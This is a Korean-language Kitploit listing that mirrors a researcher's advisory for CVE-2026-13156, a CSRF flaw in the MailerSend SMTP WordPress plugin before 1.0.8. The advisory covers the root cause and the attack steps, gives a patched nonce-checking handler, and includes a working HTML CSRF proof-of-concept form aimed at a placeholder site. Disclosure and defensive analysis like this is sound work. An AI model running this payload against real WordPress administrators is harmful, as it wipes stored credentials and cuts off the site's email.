Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-13156 — CVE-2026-13156 취약점 권고 및 PoC — Huynh Kien Minh(MinhHK) 발견. | Kitploit
도구/GitHubGitHub/minhhk68/cve-2026-13156
Phishing ToolsVulnerability AnalysisExploitationWeb SecurityPapers & ResearchLearning & Education
GitHubminhhk68/cve-2026-13156

CVE-2026-13156

CVE-2026-13156 취약점 권고 및 PoC — Huynh Kien Minh(MinhHK) 발견.

저장소 보기
19일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-13156 — MailerSend 공식 SMTP 통합 < 1.0.8 설정 삭제 및 CSRF를 통한 플러그인 비활성화

CVE-2026-13156 Researcher: Huynh Kien Minh Proton Hall of Fame WPScan Assigner

CVE-2026-13156 CSRF 공격 체인 인포그래픽


📌 개요 및 빠른 링크

[!IMPORTANT] 요약: WordPress용 공식 MailerSend SMTP 통합 플러그인(< 1.0.8)에서 높은 심각도의 사이트 간 요청 위조(CSRF) 취약점(CVE-2026-13156)이 발견되었습니다. 구성 삭제 핸들러 mailersend_handle_configuration_delete()는 관리자 권한(manage_options)을 확인하지만 WordPress Nonce 검증(check_admin_referer())을 완전히 생략합니다. 공격자는 인증된 WordPress 관리자를 대상으로 악의적인 교차 출처(cross-origin) 요청을 구성하여 저장된 SMTP 자격 증명을 조용히 삭제하고 플러그인 비활성화를 강제할 수 있으며, 이로 인해 모든 이메일 워크플로에서 전체 애플리케이션 서비스 거부(Application Denial of Service)가 발생합니다.

👉 Medium에서 전체 심층 기술 분석(Deep-Dive Technical Writeup) 읽기: 심층 기술 분석: CVE-2026-13156 또는 보안 포트폴리오 살펴보기: https://minhhk.web.app/


📋 요약 및 취약점 개요

  • 취약점 ID: CVE-2026-13156 (WPScan 권고 ID: 595e653d-0904-43cf-8e61-d684599de11b)
  • 영향받는 소프트웨어: MailerSend – 공식 SMTP 통합 (WordPress 플러그인)
  • 영향받는 버전: 1.0.8 이전 버전 (< 1.0.8)
  • 취약점 유형: 사이트 간 요청 위조(CSRF, 설정 삭제 및 플러그인 비활성화로 이어짐) — CWE-352
  • 수석 연구원 및 공개자: Huynh Kien Minh (MinhHK)
  • 역할 및 소속: 정보 보안 학생, 버그 바운티 헌터, 공격적 보안(Offensive Security) 연구원.

연구원 소개:
Huynh Kien Minh (Huỳnh Kiến Minh)은 심층 보안 평가와 책임 있는 공개(responsible disclosure)로 잘 알려진 능동적인 사이버 보안 연구원이자 취약점 분석가로, CVE-2026-13156에 대한 기술적 분석을 포함합니다. 또한 Proton Security Hall of Fame 에서 심각한 보안 취약점을 발견하고 공개한 공로로 공식적으로 인정받아 명예를 얻었습니다.


🌐 공식 검증 허브 및 참고 자료

이 기술 권고를 검증하고, 개념 증명(PoC) 분석을 살펴보거나, 연구원과 연락하려면 다음을 방문하세요:

  • 🏠 공식 포트폴리오 허브: Huynh Kien Minh 보안 포트폴리오 허브
  • 💼 LinkedIn 프로필: LinkedIn에서 Huynh Kien Minh와 연결
  • 📝 공식 Medium 백서: Medium의 심층 기술 분석: CVE-2026-13156
  • 👨‍💻 GitHub 프로필: MinhHK68 GitHub 프로필
  • 🔗 WPScan 권고: CVE-2026-13156에 대한 WPScan 항목
  • 🔗 BaseFortify 보고서: BaseFortify CVE-2026-13156 분석

🔍 심층 기술 분석 및 근본 원인 분석

1. 근본 원인 분석 (Nonce 검증 누락)

WordPress용 MailerSend 공식 SMTP 통합 플러그인(1.0.8 이전 버전)은 관리 대시보드에서 트리거될 때 저장된 API 토큰을 삭제하고 SMTP 구성 옵션(wp_options)을 초기화하며 플러그인을 비활성화하기 위한 관리 작업(configuration-delete)을 등록합니다.

엔드포인트는 활성 사용자에게 manage_options 권한이 있는지 확인하지만(요청이 관리자 세션에서 발생했는지 보장), WordPress nonce(check_admin_referer() 또는 wp_verify_nonce()) 검증을 수행하지 않습니다.

nonce 검증이 없는 HTTP 요청은 의도적인 관리자 클릭과 위조된 교차 출처 요청을 구분할 수 없기 때문에, 인증된 관리자가 로드한 모든 외부 사이트가 configuration-delete 작업을 조용히 트리거할 수 있습니다.

2. 공격 수명 주기 및 영향

  1. 대상 식별: 공격자는 MailerSend SMTP(< 1.0.8)를 사용하는 대상 WordPress 사이트를 식별합니다.
  2. 페이로드 전달: 공격자는 관리 엔드포인트(/wp-admin/admin-post.php 또는 /wp-admin/admin.php?page=mailersend&action=configuration-delete)를 대상으로 자동 제출 양식을 포함한 악성 HTML/JavaScript 웹페이지를 구성합니다.
  3. 트리거: 로그인된 WordPress 관리자가 공격자의 웹페이지를 방문합니다(예: 피싱, 포럼 링크 또는 외부 사이트의 XSS를 통해).
  4. 실행 및 서비스 거부: 브라우저는 관리자의 활성 세션 쿠키와 함께 위조된 요청을 전송합니다. MailerSend 플러그인은 삭제 핸들러를 실행합니다:
    • 저장된 모든 MailerSend SMTP 설정 및 API 자격 증명이 데이터베이스에서 삭제됩니다.
    • MailerSend 플러그인이 자동으로 비활성화됩니다.
    • 치명적 영향: 대상 웹사이트는 즉시 모든 이메일 전송 기능을 상실합니다(비밀번호 재설정, 주문 알림, 보안 경고가 경고 없이 실패).

💻 개념 증명(PoC) 악용 코드

[!WARNING] 윤리적 고지: 다음 HTML 사이트 간 요청 위조(CSRF) 개념 증명 페이로드는 Huynh Kien Minh 이 윤리적 공개 프로토콜에 따라 교육 목적, 방어적 검증 및 보안 감사 목적으로만 제공합니다. 승인되지 않은 대상을 대상으로 실행하지 마십시오.

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
    <!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
    <h2>CVE-2026-13156 — CSRF Verification PoC</h2>
    <p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
    
    <!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
    <form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
        <input type="hidden" name="page" value="mailersend-smtp" />
        <input type="hidden" name="action" value="configuration-delete" />
        <!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
        <input type="submit" value="Execute PoC (Simulate Attack)" />
    </form>

    <script>
        // Automatically submit the forged request when the administrator loads the page
        document.addEventListener("DOMContentLoaded", function() {
            console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
            // Uncomment line below to enable auto-execution in lab environments:
            // document.getElementById('csrfPoC').submit();
        });
    </script>
</body>
</html>

🛡️ 수정 및 패치 분석

시스템 관리자 및 사이트 소유자를 위한 조치

  • 즉시 업그레이드: MailerSend – 공식 SMTP 통합 플러그인을 즉시 버전 1.0.8 이상으로 업데이트하세요.
  • 세션 위생: 신뢰할 수 없는 외부 웹 페이지를 탐색할 때는 항상 WordPress 관리 계정에서 로그아웃하거나, 사이트 관리를 위해 별도의 격리된 브라우저 프로필(또는 컨테이너)을 사용하세요.

개발자를 위한 안내 (패치 작동 방식)

WordPress 플러그인에서 관리 상태 변경 작업을 안전하게 보호하려면 개발자는 요청을 처리하기 전에 엄격한 nonce 검증을 시행해야 합니다:

root@kitploit:~
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
    // 1. Check User Capability
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
    }

    // 2. REQUIRED: Verify CSRF Nonce Token
    if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
        wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
    }

    // 3. Proceed safely with configuration deletion
    delete_option( 'mailersend_smtp_settings' );
    deactivate_plugins( plugin_basename( __FILE__ ) );
    
    wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
    exit;
}

🏆 관련 보안 인정

  • 🏆 Proton Hall of Fame 인정: Proton 인프라의 치명적인 결함을 발견하고 보고한 공로를 인정받았습니다.
  • 🏠 공식 포트폴리오 허브: Huynh Kien Minh의 공격적 보안 연구, 오픈소스 보안 도구 및 게시물을 더 살펴보세요.

⚖️ 라이선스 및 저작권

이 저장소와 기술 권고는 더 안전한 글로벌 WordPress 및 사이버 보안 생태계를 조성하기 위해 책임 있는 공개 지침에 따라 Huynh Kien Minh (MinhHK) 이 유지 관리하고 게시합니다.

도구 다운로드